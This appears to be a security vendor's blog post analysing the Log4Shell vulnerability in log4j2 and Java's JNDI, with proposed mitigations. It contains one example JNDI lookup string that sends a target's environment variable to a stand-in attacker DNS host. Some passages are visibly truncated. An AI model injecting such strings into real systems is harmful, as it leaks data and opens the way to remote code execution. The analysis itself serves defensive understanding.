Risk analysis of Log4Shell (CVE-2021-44228) and mitigation

Log4Shell is a high impact exploitable bug in Java logging framework logj4. This vulnerability is basically divided in two parts: log4j2 (which allows Java programs using this component to be misled through specially crafted loggable strings to access attacker-specified URIs) and Java core (which allows unchecked execution of Java code referenced in server responses). The two parts are analyzed separately below.

log4j2

Firstly, log4j2 introduces a special syntax (Property Substitution) ‘${prefix:name}’, When the input log contains what matches the expression, ‘name’ is evaluated as specified by ‘prefix’, and the expression is finally replaced with the resulting value and written to the output log, and the syntax can be nested.

Secondly, the following functionalities have been added after LOG4J2-313: When ‘prefix’ is ‘jndi’, it evaluates to look up ‘name’ using the JNDI (Java Naming and Directory Interface) function and returns the lookup result (only the LDAP(s) protocol was initially supported for lookups to remote servers, but support for other protocols was not ruled out later). If ‘name’ does not contain a colon, the prefix ‘java:comp/env/’ is automatically added to look up, otherwise it is looked up directly. So when ‘name’ is a complete URI supported by JNDI (such as ldap URI ldap://example.com/a), log4j2 will have log4j2 access the URI directly through JNDI.

It is important to note that log4j2 evaluates the input log as long as the input log contains the expression ‘${prefix:name}’, regardless of where the expression appears in the input log, meaning that an attacker can manipulate log4j2’s behavior to the extent allowed by the Property Substitution functionality if they can make the expression appear in the input log in any way. When LOG4J2-313 introduces JNDI into Property Substitution, it is possible to manipulate log4j2 to access the attacker-specified URIs, which is sufficient to construct a DoS-type attack, or to manipulate log4j2 to access the attacker-specified server by evaluating the nested Property Substitution (e.g. the expression ‘${jndi:dns://${env:USERNAME}@.attacker.com}}}’ causes the target to query the attacker-specified DNS server ‘attacker.com’ for the evaluation of ‘${env:USERNAME}’ to bring out the argument) to aquire parameters of the target.

Java

Detailed information via https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

The worst part is Java allows Java objects (serialized as binary blobs) to be stored in the directory services used by JNDI, but because Java objects are not always serializable or not suitable for serialization, JNDI also introduces name references:

If the Codebase can be a URI, an attacker can directly provide a malicious factory class file to remotely execute code through its constructor; otherwise, the attacker can implement return-oriented programming by providing a serialized object and then initializing it with a factory class in the classpath on the target.

Mitigation for log4j2

The Property Substitution functionality originally seems to be designed for the configuration file, but because of the design error, its implementation is to first insert the expression into the log of a certain processing stage, and then evaluate it uniformly, so that the “expression” that originally appeared in the input log will also be evaluated. Therefore, the local suggestion for improvement is to limit the scope of expression evaluation to the configuration file, and at least use options to control the evaluation of “expressions” that appear in the input log (the current apache fix seems to be taking this route).

Mitigation for Java’s RCE-friendly ecosystem based on cryptographic signatures

The bigger problem is in Java itself, which, as the official documentation mention about that allows code to be loaded dynamically (even remotely) in many places without any trust restrictions. So the fundamental solution to this problem is to impose trust restrictions on Java loading remote code and serialized objects.

JAR packages have an out-of-the-box signing mechanism available. However, there is no signature mechanism for individual Java class files, but fortunately the end of the Java class data structure is relatively easy to determine, so the digital signature can be directly attached to the Java class data structure, thus extending to the “Java class file with digital signature” format, and the java class file with digital signature can be loaded like a normal Java class file with the digital signature ignored directly, but a mechanism can be added to prohibit the loading of Java class files without a trusted digital signature , and codify appropriate policies, such as prohibiting the execution of unsigned Java class files from remote sources. Signature mechanisms can also be added to serialized objects, including the ability to add and remove signatures from real-time generated streams and pre-generated blobs, as well as the ability to verify signatures (which does not actually affect the internal of the stream, equivalent to adding signatures for any data stream of limited length), and appropriately codify policies, such as prohibiting the decoding of serialized objects without a trusted signature from remote.

All of these functionalities can be implemented as a Java agent like log4j-jndi-be-gone to extend the functionality of the JVM; signature processing of serialized objects can be implemented through serialization filters. Since “RCE is not a bug but a feature” in Java’s enterprise application ecosystem, this approach can solve this security risk in the long run.

What should Devops do

As HardenedVault knows, CVE-2021-44228 does not affect some compute nodes in certain industry, which are not in the Advanced Threat Protection category, but simply do:

Developers and users of enterprise apps can refer to such scenarios.

What should system-layer protection do at least?

The least privilege matters, that is, it prohibits Java applications from running at high privileges, and even if an RCE occurs, the attacker needs to obtain kernel privileges to steal the valuable data. Although some security mechanism (RBAC/MAC/seccomp) can be very helpful but its cost may not fit for non high-value compute nodes.

Additional focus for advanced threat protection

CVE-2021-44228 has a revelatory effect for institutions that are ready to consider some advanced threat protection, that is, the industry believes that as long as the number of running web services is small, in addition to RCE, there is no need to consider local attacks, but in fact, the attack path after RCE can be leveraged by the kernel to attack lower computing components (such as firmware), and the “Vault Paradox” still needs to be included in the threat model for some scenarios. In addition, professional players with advanced threats might be able to use the exploit-in-the-wild attacks such as CVE-2021-44228, which are involved by many players (including script kiddies), as a cover to conduct against high-value targets.

Should open source maintainers be blamed? Is the Open Source Foundation the only solution?

Linux Foundation tried to solve the security problem of open source infrastructure by starting the CII (Core Infrastructure Initiative) to after famous OpenSSL vulnerablity “HeartBleed”, but things didn’t go well as expected, e.g: the managers outnumbered the maintainers. We will face more vulnerabilities like Log4Shell/CVE-2021-44228 in the future. If the solution is only to find an institution (whether it is a foundation or a regulatory authority or a bigtech), then the judgment of this institution is equivalent to putting all eggs into the same basket. In the context of grassroot culture in the open source community, Hardenedvault’s advice for open source projects is: The user (either individual or bigtech) should be responsible for whatever they “wish” (audit/hardening/etc) the software to be.